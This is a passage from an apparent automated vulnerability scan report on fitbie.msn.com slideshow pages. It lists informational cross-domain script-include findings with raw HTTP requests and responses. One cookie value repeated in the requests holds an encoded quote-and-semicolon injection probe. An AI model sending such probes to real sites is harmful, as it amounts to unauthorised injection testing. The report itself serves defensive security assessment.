v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:43 +0000
ETag: "1297607203-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42896
Expires: Mon, 14 Feb 2011 02:26:45 GMT
Date: Sun, 13 Feb 2011 14:31:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 84623

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.28. http://fitbie.msn.com/slideshow/12-ways-make-water-less-boring

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /slideshow/12-ways-make-water-less-boring

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /slideshow/12-ways-make-water-less-boring HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Fri, 11 Feb 2011 18:12:01 +0000
ETag: "1297447921-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=32554
Expires: Sat, 12 Feb 2011 06:12:01 GMT
Date: Fri, 11 Feb 2011 21:09:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 86066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.29. http://fitbie.msn.com/slideshow/30-second-weight-loss-tricks

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /slideshow/30-second-weight-loss-tricks

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /slideshow/30-second-weight-loss-tricks HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: HIT
ETag: "1297607150-1"
Last-Modified: Sun, 13 Feb 2011 14:25:50 +0000
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42728
Expires: Mon, 14 Feb 2011 02:26:45 GMT
Date: Sun, 13 Feb 2011 14:34:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 85018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.30. http://fitbie.msn.com/slideshow/8-ridiculously-cheap-healthy-foods

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /slideshow/8-ridiculously-cheap-healthy-foods

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /slideshow/8-ridiculously-cheap-healthy-foods HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: HIT
ETag: "1297600929-1"
Last-Modified: Sun, 13 Feb 2011 12:42:09 +0000
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=36701
Expires: Mon, 14 Feb 2011 00:46:52 GMT
Date: Sun, 13 Feb 2011 14:35:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 86894

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.31. http://fitbie.msn.com/slideshow/9-cutting-edge-abs-exercises

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /slideshow/9-cutting-edge-abs-exercises

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /slideshow/9-cutting-edge-abs-exercises HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: HIT
ETag: "1297607204-1"
Last-Modified: Sun, 13 Feb 2011 14:26:44 +0000
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42724
Expires: Mon, 14 Feb 2011 02:26:50 GMT
Date: Sun, 13 Feb 2011 14:34:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 83638

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.32. http://fitbie.msn.com/slideshow/amazing-weight-loss-success

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /slideshow/amazing-weight-loss-success

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /slideshow/amazing-weight-loss-success HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:49 +0000
ETag: "1297607209-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42788
Expires: Mon, 14 Feb 2011 02:27:39 GMT
Date: Sun, 13 Feb 2011 14:34:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 85130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.33. http://fitbie.msn.com/slideshow/build-perfect-home-gym

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /slideshow/build-perfect-home-gym

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /slideshow/build-perfect-home-gym HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:41 +0000
ETag: "1297607201-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42916
Expires: Mon, 14 Feb 2011 02:26:42 GMT
Date: Sun, 13 Feb 2011 14:31:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 85573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.34. http://fitbie.msn.com/slideshow/food-face

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /slideshow/food-face

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /slideshow/food-face HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: HIT
ETag: "1297607181-1"
Last-Modified: Sun, 13 Feb 2011 14:26:21 +0000
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42861
Expires: Mon, 14 Feb 2011 02:26:00 GMT
Date: Sun, 13 Feb 2011 14:31:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.35. http://fitbie.msn.com/slideshow/secrets-slim

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /slideshow/secrets-slim

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /slideshow/secrets-slim HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:45 +0000
ETag: "1297607205-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42868
Expires: Mon, 14 Feb 2011 02:26:18 GMT
Date: Sun, 13 Feb 2011 14:31:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 86352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.36. http://fitbie.msn.com/slideshow/they-lost-weight-together

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /slideshow/they-lost-weight-together

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /slideshow/they-lost-weight-together HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:47 +0000
ETag: "1297607207-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42896
Expires: Mon, 14 Feb 2011 02:26:48 GMT
Date: Sun, 13 Feb 2011 14:31:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 85711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.37. http://fitbie.msn.com/slideshow/why-being-single-better-your-body

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /slideshow/why-being-single-better-your-body

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /slideshow/why-being-single-better-your-body?ocid=xnetr1-1 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
